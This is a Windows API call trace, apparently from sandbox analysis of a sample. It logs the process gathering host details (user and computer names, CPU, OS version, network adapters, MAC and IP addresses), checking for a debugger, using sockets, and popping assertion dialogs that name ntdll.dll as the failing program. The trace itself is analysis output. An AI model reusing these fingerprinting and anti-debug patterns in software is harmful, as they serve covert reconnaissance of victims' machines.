	[0112.514] GetProcessWindowStation () returned 0x84
	[0112.514] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0112.514] GetActiveWindow () returned 0x0
	[0112.514] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0112.779] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0112.918] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26430a0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x112, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.918] SetLastError (dwErrCode=0x0) 
	[0112.919] SetLastError (dwErrCode=0x0) 
	[0112.919] SetLastError (dwErrCode=0x0) 
	[0112.919] GetEnvironmentVariableW (in: lpName="debug_tls", lpBuffer=0x209f18c, nSize=0x7fff | out: lpBuffer="\xf37c\x20a\xf1e0\x209\x04") returned 0x0
	[0112.919] GetLastError () returned 0xcb
	[0112.920] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f094, nSize=0x7fff | out: lpBuffer="\x04") returned 0x0
	[0112.920] GetLastError () returned 0xcb
	[0112.920] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x209efdc, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0112.921] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26b6180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55
	[0112.921] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26b6180, cbMultiByte=-1, lpWideCharStr=0x26b60d0, cchWideChar=55 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\fatal-log.txt") returned 55
	[0112.921] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0112.921] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x209efdc, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0112.922] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x582b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58
	[0112.922] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x582b98, cbMultiByte=-1, lpWideCharStr=0x583940, cchWideChar=58 | out: lpWideCharStr="\\\\?\\C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uncaught-log.txt") returned 58
	[0112.922] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0112.923] timeGetTime () returned 0x2fb4f
	[0112.924] setsockopt (s=0xa24, level=65535, optname=8, optval="\x01", optlen=4) returned 0
	[0112.924] setsockopt (s=0xa24, level=6, optname=3, optval="", optlen=4) returned 0
	[0112.924] setsockopt (s=0xa24, level=6, optname=1, optval="\x01", optlen=4) returned 0
	[0112.925] timeGetTime () returned 0x2fb50
	[0112.925] SetLastError (dwErrCode=0x0) 
	[0112.925] GetLastError () returned 0x0
	[0112.925] SetLastError (dwErrCode=0x0) 
	[0112.925] GetLastError () returned 0x0
	[0112.925] SetLastError (dwErrCode=0x0) 
	[0112.925] GetTimeZoneInformation (in: lpTimeZoneInformation=0x44a53a8 | out: lpTimeZoneInformation=0x44a53a8) returned 0x1
	[0112.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x43ee2d8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x20af06c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x20af06c) returned 24
	[0112.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x43ee318, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x20af06c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x20af06c) returned 24
	[0112.925] GetTimeZoneInformation (in: lpTimeZoneInformation=0x25cb30c | out: lpTimeZoneInformation=0x25cb30c) returned 0x1
	[0112.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x25cb209, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x0) returned 24
	[0112.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x25cb289, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x0) returned 24
	[0112.925] GetLastError () returned 0x0
	[0112.927] SetLastError (dwErrCode=0x0) 
	[0112.927] GetLastError () returned 0x0
	[0112.927] SetLastError (dwErrCode=0x0) 
	[0112.927] GetLastError () returned 0x0
	[0112.927] SetLastError (dwErrCode=0x0) 
	[0112.927] GetTimeZoneInformation (in: lpTimeZoneInformation=0x44a53a8 | out: lpTimeZoneInformation=0x44a53a8) returned 0x1
	[0112.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x43ee2d8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x20af000 | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x20af000) returned 24
	[0112.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x43ee318, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x20af000 | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x20af000) returned 24
	[0112.927] timeGetTime () returned 0x2fb53
	[0112.928] GetSystemInfo (in: lpSystemInfo=0x20aeccc | out: lpSystemInfo=0x20aeccc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0112.929] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x401f160, phModule=0x20ae160 | out: phModule=0x20ae160*=0x77960000) returned 1
	[0112.929] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0112.929] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20ae5ec, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0112.930] IsDebuggerPresent () returned 0
	[0112.930] GetProcessWindowStation () returned 0x84
	[0112.930] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20ae12c, nLength=0xc, lpnLengthNeeded=0x20ae118 | out: pvInfo=0x20ae12c, lpnLengthNeeded=0x20ae118) returned 1
	[0112.930] GetActiveWindow () returned 0x0
	[0112.930] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\util.c\nLine: 655\n\nExpression: result_size == sppi_size\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0113.139] GetLastError () returned 0x0
	[0113.140] SetLastError (dwErrCode=0x0) 
	[0113.140] GetLastError () returned 0x0
	[0113.140] SetLastError (dwErrCode=0x0) 
	[0113.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x1, phkResult=0x20aeca8 | out: phkResult=0x20aeca8*=0xa34) returned 0x0
	[0113.140] RegQueryValueExW (in: hKey=0xa34, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20aecc8, lpcbData=0x20aecc0*=0x4 | out: lpType=0x0, lpData=0x20aecc8*=0xac, lpcbData=0x20aecc0*=0x4) returned 0x0
	[0113.140] RegQueryValueExW (in: hKey=0xa34, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20aedf0, lpcbData=0x20aecb0*=0x200 | out: lpType=0x0, lpData=0x20aedf0*=0x49, lpcbData=0x20aecb0*=0x52) returned 0x0
	[0113.140] RegCloseKey (hKey=0xa34) returned 0x0
	[0113.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0113.140] SetLastError (dwErrCode=0x0) 
	[0113.140] GetLastError () returned 0x0
	[0113.141] SetLastError (dwErrCode=0x0) 
	[0113.141] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\1", ulOptions=0x0, samDesired=0x1, phkResult=0x20aeca8 | out: phkResult=0x20aeca8*=0xa34) returned 0x0
	[0113.141] RegQueryValueExW (in: hKey=0xa34, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20aecc8, lpcbData=0x20aecc0*=0x4 | out: lpType=0x0, lpData=0x20aecc8*=0xac, lpcbData=0x20aecc0*=0x4) returned 0x0
	[0113.141] RegQueryValueExW (in: hKey=0xa34, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20aedf0, lpcbData=0x20aecb0*=0x200 | out: lpType=0x0, lpData=0x20aedf0*=0x49, lpcbData=0x20aecb0*=0x52) returned 0x0
	[0113.141] RegCloseKey (hKey=0xa34) returned 0x0
	[0113.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0113.141] SetLastError (dwErrCode=0x0) 
	[0113.141] GetLastError () returned 0x0
	[0113.141] SetLastError (dwErrCode=0x0) 
	[0113.141] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\2", ulOptions=0x0, samDesired=0x1, phkResult=0x20aeca8 | out: phkResult=0x20aeca8*=0xa34) returned 0x0
	[0113.141] RegQueryValueExW (in: hKey=0xa34, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20aecc8, lpcbData=0x20aecc0*=0x4 | out: lpType=0x0, lpData=0x20aecc8*=0xac, lpcbData=0x20aecc0*=0x4) returned 0x0
	[0113.141] RegQueryValueExW (in: hKey=0xa34, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20aedf0, lpcbData=0x20aecb0*=0x200 | out: lpType=0x0, lpData=0x20aedf0*=0x49, lpcbData=0x20aecb0*=0x52) returned 0x0
	[0113.141] RegCloseKey (hKey=0xa34) returned 0x0
	[0113.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0113.141] SetLastError (dwErrCode=0x0) 
	[0113.141] GetLastError () returned 0x0
	[0113.142] SetLastError (dwErrCode=0x0) 
	[0113.142] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\3", ulOptions=0x0, samDesired=0x1, phkResult=0x20aeca8 | out: phkResult=0x20aeca8*=0xa34) returned 0x0
	[0113.142] RegQueryValueExW (in: hKey=0xa34, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20aecc8, lpcbData=0x20aecc0*=0x4 | out: lpType=0x0, lpData=0x20aecc8*=0xac, lpcbData=0x20aecc0*=0x4) returned 0x0
	[0113.142] RegQueryValueExW (in: hKey=0xa34, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20aedf0, lpcbData=0x20aecb0*=0x200 | out: lpType=0x0, lpData=0x20aedf0*=0x49, lpcbData=0x20aecb0*=0x52) returned 0x0
	[0113.142] RegCloseKey (hKey=0xa34) returned 0x0
	[0113.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
	[0113.142] SetLastError (dwErrCode=0x0) 
	[0113.142] SetLastError (dwErrCode=0x0) 
	[0113.142] GetLastError () returned 0x0
	[0113.142] SetLastError (dwErrCode=0x0) 
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] GetLastError () returned 0x0
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] GetLastError () returned 0x0
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] GetLastError () returned 0x0
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] SetLastError (dwErrCode=0x0) 
	[0113.143] GetLastError () returned 0x0
	[0113.144] SetLastError (dwErrCode=0x0) 
	[0113.144] SetLastError (dwErrCode=0x0) 
	[0113.144] GetVersionExW (in: lpVersionInformation=0x20aef44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x18, dwBuildNumber=0x20aef88, dwPlatformId=0x25b4be0, szCSDVersion="\x4be0\x25b") | out: lpVersionInformation=0x20aef44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0113.144] wsprintfA (in: param_1=0x20aee44, param_2="%d.%d.%d" | out: param_1="6.2.9200") returned 8
	[0113.144] GetNativeSystemInfo (in: lpSystemInfo=0x20af020 | out: lpSystemInfo=0x20af020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0113.146] RegQueryValueExW (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x20ae050, lpcbData=0x20ae040*=0x1000 | out: lpType=0x0, lpData=0x20ae050*=0x50, lpcbData=0x20ae040*=0x3e0) returned 0x0
	[0113.412] GetLastError () returned 0x0
	[0113.412] SetLastError (dwErrCode=0x0) 
	[0113.412] GetLastError () returned 0x0
	[0113.413] SetLastError (dwErrCode=0x0) 
	[0113.413] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="\\Users\\Nd9E1FYi") returned 0xf
	[0113.413] GetEnvironmentVariableW (in: lpName="COMPUTERNAME", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="X2VS1CUM") returned 0x8
	[0113.413] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="C:") returned 0x2
	[0113.413] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="C:\\Windows") returned 0xa
	[0113.413] GetEnvironmentVariableW (in: lpName="USERDOMAIN", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="X2VS1CUM") returned 0x8
	[0113.414] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x8
	[0113.414] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0113.414] GetEnvironmentVariableW (in: lpName="LOGONSERVER", lpBuffer=0x209ef84, nSize=0x7fff | out: lpBuffer="\\\\X2VS1CUM") returned 0xa
	[0113.414] GlobalMemoryStatusEx (in: lpBuffer=0x20af008 | out: lpBuffer=0x20af008) returned 1
	[0113.414] GlobalMemoryStatusEx (in: lpBuffer=0x20af008 | out: lpBuffer=0x20af008) returned 1
	[0113.415] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
	[0113.415] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
	[0113.415] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
	[0113.415] VerSetConditionMask (ConditionMask=0x1801b, TypeMask=0x80000000, Condition=0x10) returned 0x1b01b
	[0113.415] VerifyVersionInfoA (in: lpVersionInformation=0x20aee04, dwTypeMask=0x33, dwlConditionMask=0x1b01b | out: lpVersionInformation=0x20aee04) returned 1
	[0113.415] GetAdaptersAddresses () returned 0x6f
	[0113.427] GetLastError () returned 0x0
	[0113.427] SetLastError (dwErrCode=0x0) 
	[0113.427] GetLastError () returned 0x0
	[0113.427] SetLastError (dwErrCode=0x0) 
	[0113.427] GetAdaptersAddresses () returned 0x0
	[0113.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ethernet", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
	[0113.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Loopback Pseudo-Interface 1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28
	[0113.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local Area Connection* 3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0113.451] htonl (hostlong=0xffffff00) returned 0xffffff
	[0113.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Loopback Pseudo-Interface 1", cchWideChar=-1, lpMultiByteStr=0x51d4f19, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loopback Pseudo-Interface 1", lpUsedDefaultChar=0x0) returned 28
	[0113.451] htonl (hostlong=0xff000000) returned 0xff
	[0113.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local Area Connection* 3", cchWideChar=-1, lpMultiByteStr=0x51d4f35, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Local Area Connection* 3", lpUsedDefaultChar=0x0) returned 25
	[0113.451] GetLastError () returned 0x0
	[0113.451] SetLastError (dwErrCode=0x0) 
	[0113.451] SetLastError (dwErrCode=0x0) 
	[0113.451] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="d8:71:57:e4:2f:01") returned 17
	[0113.451] GetLastError () returned 0x0
	[0113.452] SetLastError (dwErrCode=0x0) 
	[0113.452] GetLastError () returned 0x0
	[0113.452] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.456] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.456] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.456] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.456] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.456] SetLastError (dwErrCode=0x0) 
	[0113.456] GetLastError () returned 0x0
	[0113.457] SetLastError (dwErrCode=0x0) 
	[0113.457] GetLastError () returned 0x0
	[0113.457] SetLastError (dwErrCode=0x0) 
	[0113.457] GetLastError () returned 0x0
	[0113.457] SetLastError (dwErrCode=0x0) 
	[0113.457] GetLastError () returned 0x0
	[0113.457] SetLastError (dwErrCode=0x0) 
	[0113.457] GetLastError () returned 0x0
	[0113.457] SetLastError (dwErrCode=0x0) 
	[0113.457] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="d8:71:57:e4:2f:01") returned 17
	[0113.458] GetLastError () returned 0x0
	[0113.458] SetLastError (dwErrCode=0x0) 
	[0113.458] GetLastError () returned 0x0
	[0113.459] SetLastError (dwErrCode=0x0) 
	[0113.459] GetLastError () returned 0x0
	[0113.459] SetLastError (dwErrCode=0x0) 
	[0113.459] GetLastError () returned 0x0
	[0113.459] SetLastError (dwErrCode=0x0) 
	[0113.459] GetLastError () returned 0x0
	[0113.459] SetLastError (dwErrCode=0x0) 
	[0113.459] strncpy (in: _Dest=0x20aefac, _Source="192.168.0.240", _Count=0x41 | out: _Dest="192.168.0.240") returned="192.168.0.240"
	[0113.459] GetLastError () returned 0x0
	[0113.459] SetLastError (dwErrCode=0x0) 
	[0113.459] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] strncpy (in: _Dest=0x20aeff0, _Source="255.255.255.0", _Count=0x41 | out: _Dest="255.255.255.0") returned="255.255.255.0"
	[0113.460] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.460] GetLastError () returned 0x0
	[0113.460] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.461] SetLastError (dwErrCode=0x0) 
	[0113.461] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.462] SetLastError (dwErrCode=0x0) 
	[0113.462] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0113.463] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] GetLastError () returned 0x0
	[0113.463] SetLastError (dwErrCode=0x0) 
	[0113.463] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] strncpy (in: _Dest=0x20aefac, _Source="127.0.0.1", _Count=0x41 | out: _Dest="127.0.0.1") returned="127.0.0.1"
	[0113.464] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] GetLastError () returned 0x0
	[0113.464] SetLastError (dwErrCode=0x0) 
	[0113.464] GetLastError () returned 0x0
	[0113.465] SetLastError (dwErrCode=0x0) 
	[0113.465] strncpy (in: _Dest=0x20aeff0, _Source="255.0.0.0", _Count=0x41 | out: _Dest="255.0.0.0") returned="255.0.0.0"
	[0113.465] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0113.465] GetLastError () returned 0x0
	[0113.465] SetLastError (dwErrCode=0x0) 
	[0113.465] GetLastError () returned 0x0
	[0113.465] SetLastError (dwErrCode=0x0) 
	[0113.465] GetLastError () returned 0x0
	[0113.465] SetLastError (dwErrCode=0x0) 
	[0113.465] GetLastError () returned 0x0
	[0113.465] SetLastError (dwErrCode=0x0) 
	[0113.465] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.466] SetLastError (dwErrCode=0x0) 
	[0113.466] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.467] SetLastError (dwErrCode=0x0) 
	[0113.467] GetLastError () returned 0x0
	[0113.468] SetLastError (dwErrCode=0x0) 
	[0113.468] GetLastError () returned 0x0
	[0113.468] SetLastError (dwErrCode=0x0) 
	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
